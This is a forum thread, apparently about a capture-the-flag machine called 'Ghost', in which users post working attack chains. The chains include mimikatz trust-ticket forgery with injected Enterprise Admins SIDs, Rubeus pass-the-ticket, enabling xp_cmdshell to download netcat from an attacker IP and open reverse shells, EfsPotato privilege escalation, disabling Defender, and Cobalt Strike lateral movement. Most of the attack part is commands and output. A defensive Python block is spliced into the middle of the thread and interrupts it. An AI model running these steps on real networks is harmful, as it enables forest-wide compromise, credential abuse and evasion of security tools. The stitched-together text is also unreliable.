Ghost - Insane
by f4k3h4ck3r - Saturday July 13, 2024 at 03:43 PM
(07-17-2024, 09:16 PM)mazafaka555 Wrote:
(07-17-2024, 12:48 PM)floridaman389 Wrote:
mimikatz # kerberos::golden /user:blahblah /domain:CORP.GHOST.HTB /sid:S-1-5-21-2034262909-2733679486-000000000 /sids:S-1-5-21-4084500788-938703357-3654145966-512 /rc4:dae1ad83e2af14a379017f244a2f5297 /service:krbtgt /target:GHOST.HTB /ticket:golden_trust.kirbi
User      : blahblah
Domain    : CORP.GHOST.HTB (CORP)
SID      : S-1-5-21-2034262909-2733679486-000000000
User Id  : 500
Groups Id : *513 512 520 518 519
Extra SIDs: S-1-5-21-4084500788-938703357-3654145966-512 ;
ServiceKey: dae1ad83e2af14a379017f244a2f5297 - rc4_hmac_nt     
Service  : krbtgt
Target    : GHOST.HTB
Lifetime  : 7/17/2024 5:53:18 AM ; 7/15/2034 5:53:18 AM ; 7/15/2034 5:53:18 AM
-> Ticket : golden_trust.kirbi

* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated

Final Ticket Saved to file !

mimikatz # exit
Bye!

PS C:\tmp> .\Rubeus.exe asktgs /ticket:C:\tmp\golden_trust.kirbi /service:cifs/DC01.ghost.htb /dc:DC01.ghost.htb /ptt /nowrap


  ______        _                     
  (_____ \      | |                   
  _____) )_  _| |__  _____ _  _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|  |_|____/|____/|_____)____/(___/

  v2.2.1

[*] Action: Ask TGS
[*] Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket
[*] Building TGS-REQ request for: 'cifs/DC01.ghost.htb'
[*] Using domain controller: DC01.ghost.htb (10.10.11.24)
[+] TGS request successful!
[+] Ticket successfully imported!
[*] base64(ticket.kirbi):
  ServiceName              :  cifs/DC01.ghost.htb
  ServiceRealm            :  GHOST.HTB
  UserName                :  blahblah
  UserRealm                :  CORP.GHOST.HTB
  StartTime                :  7/17/2024 5:53:37 AM
  EndTime                  :  7/17/2024 3:53:37 PM
  RenewTill                :  7/24/2024 5:53:37 AM
  Flags                    :  name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable
  KeyType                  :  aes256_cts_hmac_sha1
  Base64(key)              :  FFZuLFXPRiMmm20Qf21jMAGKTdyRWI0ijpLGdtmdiO8=

PS C:\tmp> ls \\dc01.ghost.htb\C$
    Directory: \\dc01.ghost.htb\C$
Mode                LastWriteTime        Length Name                                                               
----                -------------        ------ ----                                                               
d-----          5/8/2021  1:20 AM                PerfLogs                                                           
d-r---          2/2/2024  8:17 PM                Program Files                                                       
d-----          2/2/2024  8:16 PM                Program Files (x86)                                                 
d-r---          2/4/2024  1:48 PM                Users                                                               
d-----        7/10/2024  3:08 AM                Windows                                                             
Something's fucking wrong with the `GHOST$` account on the `PRIMARY` host.

Notice the user and SID that I set.

If it's a golden ticket attack, it must use the RC4 hash of the `krbtgt` account.
But in this case, the RC4 hash must be that of the `GHOST$` account. Why is that?
Is that because the `GHOST$` account is a trust account across the forest?
So this isn't technically a golden ticket attack, but rather a modified one?
I bet this was misconfigured in the first place, but so many questions.

Technically, this is not a "Golden Ticket".. this is rather an abuse of misconfigured "Domain trust" relationships.
In this case we're able to escalate from one Domain Admin (local admin in this case) to Enterprise Admins,
which leads to a full forest compromise, and this CORP is simply finished off... mimikatz just doesn't know about "Forest Trust" compromises.

[Image: cs2.png]

Thank you for clarifying that! I was losing my hair over it LOL
How could I go from accessing `dc01.ghost.htb` via SMB to opening up a shell?

I tried PsExec, but it didn't work out, and I don't have Cobalt Strike :/
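A defender-side way to check the trust behaviour mazafaka555 describes above, added here as an example and not code from any post in this thread: it decodes an AD trust's trustAttributes value and applies a simplified version of the SID-filtering rules to a SID-history entry like the one the mimikatz /sids: option injects. The domain SIDs are the ones quoted in the thread; the trustAttributes values it is fed are constructed.

```python
# Added example, not from any post in this thread: decode an AD trustedDomain
# object's trustAttributes value and apply a simplified version of the
# SID-filtering rules (MS-PAC 4.1.2.2) to a SID-history entry such as the one
# mimikatz's /sids: option injects. Flag values are from MS-ADTS; the domain
# SIDs are quoted from the thread; the attribute values below are constructed.
from typing import Dict, List, Tuple

TRUST_ATTRIBUTE_FLAGS = {
    0x00000001: "NON_TRANSITIVE",
    0x00000002: "UPLEVEL_ONLY",
    0x00000004: "QUARANTINED_DOMAIN",  # SID filter quarantining (external trusts)
    0x00000008: "FOREST_TRANSITIVE",   # forest trust
    0x00000010: "CROSS_ORGANIZATION",
    0x00000020: "WITHIN_FOREST",       # parent/child or tree-root trust
    0x00000040: "TREAT_AS_EXTERNAL",   # forest trust with SID history enabled
    0x00000080: "USES_RC4_ENCRYPTION",  # MIT realm trust keyed with RC4
    0x00000200: "CROSS_ORGANIZATION_NO_TGT_DELEGATION",
    0x00000400: "PIM_TRUST",
    0x00000800: "CROSS_ORGANIZATION_ENABLE_TGT_DELEGATION",
}

# Domain SIDs as quoted in the thread (the trailing -502 on one of them in the
# thread is the krbtgt RID, not part of the domain SID).
CORP_SID = "S-1-5-21-2034262909-2733679486-179904498"  # CORP.GHOST.HTB
ROOT_SID = "S-1-5-21-4084500788-938703357-3654145966"  # GHOST.HTB
ENTERPRISE_ADMINS_RID = 519


def decode_trust_attributes(value: int) -> List[str]:
    """Names of the flags set in a trustAttributes value, lowest bit first."""
    return [name for bit, name in TRUST_ATTRIBUTE_FLAGS.items() if value & bit]


def split_sid(sid: str) -> Tuple[str, int]:
    """Split 'S-1-5-21-a-b-c-RID' into the domain identifier and the RID."""
    domain, _, rid = sid.rpartition("-")
    return domain, int(rid)


def sid_history_passes(trust_attributes: int, trusted_domain_sid: str,
                       extra_sid: str) -> bool:
    """Would the trusting DC keep this domain SID (S-1-5-21-...) from the SID
    history of a ticket that arrived over the given trust? Simplified: the
    trusted side is taken to be a single domain, well-known non-domain SIDs are
    ignored, and the relaxation TREAT_AS_EXTERNAL grants is not modelled."""
    flags = decode_trust_attributes(trust_attributes)
    domain, rid = split_sid(extra_sid)
    if "WITHIN_FOREST" in flags:
        # Intra-forest trusts do no SID filtering: a child-domain ticket that
        # carries the root domain's RID 519 is honoured, which is why the
        # forest, not the domain, is the security boundary.
        return True
    if "QUARANTINED_DOMAIN" in flags:
        # Quarantined external trust: only SIDs issued by the trusted domain.
        return domain == trusted_domain_sid
    if "FOREST_TRANSITIVE" in flags:
        # Forest trust: SIDs from the trusted forest survive, except the
        # well-known RIDs below 1000 (512 Domain Admins, 519 Enterprise Admins).
        return domain == trusted_domain_sid and rid >= 1000
    # External trust with quarantining switched off: nothing is filtered.
    return True


def audit_trust(trust_attributes: int, trusted_domain_sid: str) -> Dict[str, object]:
    """What a reviewer wants to know about one trust: its flags, and whether a
    root-domain Enterprise Admins SID in SID history would be honoured."""
    probe = f"{ROOT_SID}-{ENTERPRISE_ADMINS_RID}"
    return {
        "flags": decode_trust_attributes(trust_attributes),
        "root_ea_sid_history_honoured": sid_history_passes(
            trust_attributes, trusted_domain_sid, probe),
    }


if __name__ == "__main__":
    # Constructed attribute values, each with CORP on the trusted side.
    for label, attrs in (("parent-child", 0x20), ("forest trust", 0x08),
                         ("external, quarantined", 0x04)):
        print(f"{label}: {audit_trust(attrs, CORP_SID)}")
```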
[-] ERROR(DC01): Line 1: Could not find stored procedure 'enum_links'.

Already added the host, but?
(07-18-2024, 09:15 AM)floridaman389 Wrote:
Thank you for clarifying that! I was losing my hair over it LOL
How could I go from accessing `dc01.ghost.htb` via SMB to opening up a shell?

I tried PsExec, but it didn't work out, and I don't have Cobalt Strike :/

copy nc.exe \\DC01.ghost.htb\c$\Windows\Temp\
.\PsExec64.exe \\DC01.ghost.htb cmd.exe /c "C:\Windows\Temp\nc.exe -e powershell <ip> <port>"
(07-18-2024, 03:28 AM)fuliye Wrote:
wtf, man, why can you jump? I can't jump, please show the command T_T

First of all, make sure that your raw payload (non-crypted) actually bypasses Windows Defender.. then you can utilize the usual techniques for lateral movement, like `jump psexec64` or remote-exec and so on..
https://mvc1009.github.io/hackingnotes/red-team/lateral-movement/

If all of these still don't work for you, for some reason... you can still use PsExec from the Sysinternals suite, which won't be flagged by any AV product.
Make sure you have a correct ticket first & then:

beacon> dir \\DC01.ghost.htb\C$\Users\Administrator\Desktop
beacon> cd \\dc01.ghost.htb\c$\ProgramData
beacon> upload /home/kali/htb/machines/ghost/drop/smb-loader.exe

beacon> run .\PsExec.exe \\DC01.ghost.htb "c:\programdata\smb-loader.exe"
PsExec v2.43 - Execute processes remotely
Copyright (C) 2001-2023 Mark Russinovich
Sysinternals - www.sysinternals.com

Connecting to DC01.ghost.htb...Starting PSEXESVC service on DC01.ghost.htb...
Copying authentication key to DC01.ghost.htb...Connecting with PsExec service on DC01.ghost.htb...
Starting c:\programdata\smb-loader.exe on DC01.ghost.htb...

beacon> link DC01.ghost.htb msagent_0d

[*] Tasked to link to \\DC01.ghost.htb\pipe\msagent_0d
[+] host called home, sent: 41 bytes
[+] established link to child beacon: 10.0.0.254
beacon> getuid
[*] You are CORP\Administrator (admin)
(07-16-2024, 05:35 AM)princecyber Wrote: First Phase:
impacket-mssqlclient florence.ramirez:'uxLmt*udNc6t3HrF'@Ghost.htb -windows-auth
enum_links
use_link [PRIMARY]
use master
exec_as_login sa
EXEC sp_configure 'show advanced options', 1
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell';
EXEC xp_cmdshell 'powershell -c "Invoke-WebRequest -Uri http://10.10.x.x/nc64.exe -OutFile $env:TEMP\nc.exe"';
EXEC xp_cmdshell '%TEMP%\nc.exe -e cmd.exe 10.10.x.x 4444';

Second Phase:
https://github.com/zcgonvh/EfsPotato (download the EfsPotato.cs file), which will help to gain privilege escalation.
C:\Windows\Microsoft.Net\Framework\v4.0.30319\csc.exe EfsPotato.cs -nowarn:1691,618
Download nc.exe, which is not triggered by AV, into any folder like Documents or Downloads.
./EfsPotato.exe 'nc.exe -e cmd.exe 10.10.x.x 5555' (gives an admin shell)

Third Phase (disabling AV and getting access to the DC):
Set-MpPreference -DisableRealtimeMonitoring $true
.\mimikatz "lsadump::trust /patch" exit
.\mimikatz.exe "kerberos::golden /user:Administrator /domain:CORP.GHOST.HTB /sid:S-1-5-21-2034262909-2733679486-179904498-502 /sids:S-1-5-21-4084500788-938703357-3654145966-519 /rc4:dae1ad83e2af14a379017f244a2f5297 /service:krbtgt /target:GHOST.HTB /ticket:golden.kirbi" exit
.\Rubeus.exe asktgs /ticket:golden.kirbi /dc:dc01.ghost.htb /service:CIFS/dc01.ghost.htb /nowrap /ptt
type \\DC01.ghost.htb\c$\Users\justin.bradley\Desktop\user.txt
type \\DC01.ghost.htb\c$\Users\Administrator\Desktop\root.txt
Thanks for the guide, it is very detailed, but it only works if someone has already disabled Defender; otherwise it will delete the nc binaries. In my case I uploaded my own PowerShell shell to trick the AV.
(07-18-2024, 01:14 PM)Axura Wrote:
copy nc.exe \\DC01.ghost.htb\c$\Windows\Temp\
.\PsExec64.exe \\DC01.ghost.htb cmd.exe /c "C:\Windows\Temp\nc.exe -e powershell <ip> <port>"

That doesn't work. It just hangs and eats up so many resources that the host becomes unresponsive.
Guys, is there any way to change my username?
(07-18-2024, 01:15 PM)mazafaka555 Wrote:
First of all, make sure that your raw payload (non-crypted) actually bypasses Windows Defender.. then you can utilize the usual techniques for lateral movement, like `jump psexec64` or remote-exec and so on..
https://mvc1009.github.io/hackingnotes/red-team/lateral-movement/

If all of these still don't work for you, for some reason... you can still use PsExec from the Sysinternals suite, which won't be flagged by any AV product.
wtf, nice, thx man
Awesome, this forum has really helped me.. thank you very much bois
Can somebody please tell me how to disable AV once it's in NT SERVICE\MSSQLSERVER?

